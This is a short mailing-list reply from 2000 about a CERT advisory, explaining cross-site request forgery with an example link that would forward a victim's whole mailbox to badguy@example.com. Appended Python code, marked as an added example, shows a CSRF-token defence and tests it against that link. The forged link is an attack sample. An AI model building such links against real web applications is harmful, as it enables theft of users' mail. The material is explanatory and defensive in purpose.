Subject: Re: Fwd: CERT Advisory CA-2000-02
From: Cassius (sekurity@HOTMAIL.COM)
Date: Thu Feb 03 2000 - 16:11:36 CST
Shockro,
The danger is also in variables. Pretend that I get you to click on this
link from within your custom intranet mail app.
http://intranet.example.com/mailbox.asp?action=forward&item=all&recipient=badguy@example.com
It would forward all of your mail to badguy@example.com. This would work
because you already have a session with mailbox.asp.
Of course mailbox.asp is fake but you get the idea.
-Cassius
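
A server-side check that would refuse the request described in the message above, as an added example that is not part of the original post: state-changing actions are accepted only from a POST body carrying a token bound to the session. The action names, the `csrf_token` field and the session id are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

SERVER_KEY = secrets.token_bytes(32)      # per-deployment secret (constructed)
STATE_CHANGING = {"forward", "delete"}    # hypothetical action names

def csrf_token(session_id: str) -> str:
    """Token bound to one session; the app embeds it in forms it serves itself."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def authorize(method: str, url: str, form: dict, session_id: str):
    """Return (allowed, reason) for a request that already has a valid session."""
    query = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    action = (query.get("action") or form.get("action", "")).lower()
    if action not in STATE_CHANGING:
        return True, "read-only action"
    # A clicked link is always a GET with its parameters in the URL: refuse it.
    if method != "POST" or "action" in query:
        return False, "state change must arrive in a POST body"
    # A cross-site form can POST with the user's session cookie attached,
    # but it cannot know the token tied to that session.
    sent = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(sent, csrf_token(session_id).encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"

BASE = "http://intranet.example.com/mailbox.asp"
LINK = BASE + "?action=forward&item=all&recipient=badguy@example.com"  # from the message
SESSION = "constructed-session-id"        # constructed sample value

def demo():
    """Run the link from the message, a forged POST, a genuine POST and a read."""
    good = {"action": "forward", "item": "1", "recipient": "colleague@example.com",
            "csrf_token": csrf_token(SESSION)}
    forged = {"action": "forward", "item": "all", "recipient": "badguy@example.com"}
    return [
        authorize("GET", LINK, {}, SESSION),
        authorize("POST", BASE, forged, SESSION),
        authorize("POST", BASE, good, SESSION),
        authorize("GET", BASE + "?action=list", {}, SESSION),
    ]

if __name__ == "__main__":
    for allowed, reason in demo():
        print(allowed, reason)
```
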